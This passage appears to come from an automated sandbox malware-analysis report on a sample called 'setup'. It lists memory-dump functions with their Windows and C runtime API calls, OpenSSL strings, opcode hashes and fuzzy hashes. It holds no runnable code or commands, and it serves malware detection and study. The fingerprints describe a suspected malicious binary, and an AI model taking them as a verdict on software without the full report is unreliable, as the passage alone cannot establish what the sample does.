                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 2824100046-0
                • Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                • Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                APIs
                • lstrlenA.KERNEL32 ref: 00412806
                • _malloc.LIBCMT ref: 00412814
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5
                • _memset.LIBCMT ref: 0041281F
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 2824100046-0
                • Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                • Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                • Opcode Fuzzy Hash: 9bedb6a4875daed597998ed3f540e95eec51a82ba5ae0fcf6873f5b611974ef0
                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\asn1\tasn_new.c
                • API String ID: 2102423945-2878120539
                • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 7df1e10ad76e29fab8b9693ecc8e3a17a06a76cc108172ebea4210ab36e9a770
                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                • Opcode Fuzzy Hash: 7df1e10ad76e29fab8b9693ecc8e3a17a06a76cc108172ebea4210ab36e9a770
                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .\crypto\err\err.c$unknown
                • API String ID: 0-565200744
                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8Q
                • API String ID: 3761405300-2096853525
                • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                • _memset.LIBCMT ref: 00413C83
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                • String ID: vector<T> too long
                • API String ID: 1327501947-3788999226
                • Opcode ID: e5c94bc44cf57a372b92b54ac174d1763daff5f3c1caf4189f35d58b11ed2149
                • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                • Opcode Fuzzy Hash: e5c94bc44cf57a372b92b54ac174d1763daff5f3c1caf4189f35d58b11ed2149
                • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                APIs
                Strings
                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt
                • String ID: Assertion failed: %s, file %s, line %d
                • API String ID: 3494438863-969893948
                • Opcode ID: 9da3a8cb00f8be44138af9ef65efde1430dd0e2db54f2e174abcd107dffc3b0f
                • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                • Opcode Fuzzy Hash: 9da3a8cb00f8be44138af9ef65efde1430dd0e2db54f2e174abcd107dffc3b0f
                • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                APIs
                • _memset.LIBCMT ref: 00480686
                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                Strings
                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                • .\crypto\evp\digest.c, xrefs: 00480638
                Memory Dump Source
                • Source File: 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000007.00000002.2789432788.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.2789432788.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset_raise
                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                • API String ID: 1484197835-3867593797
                • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99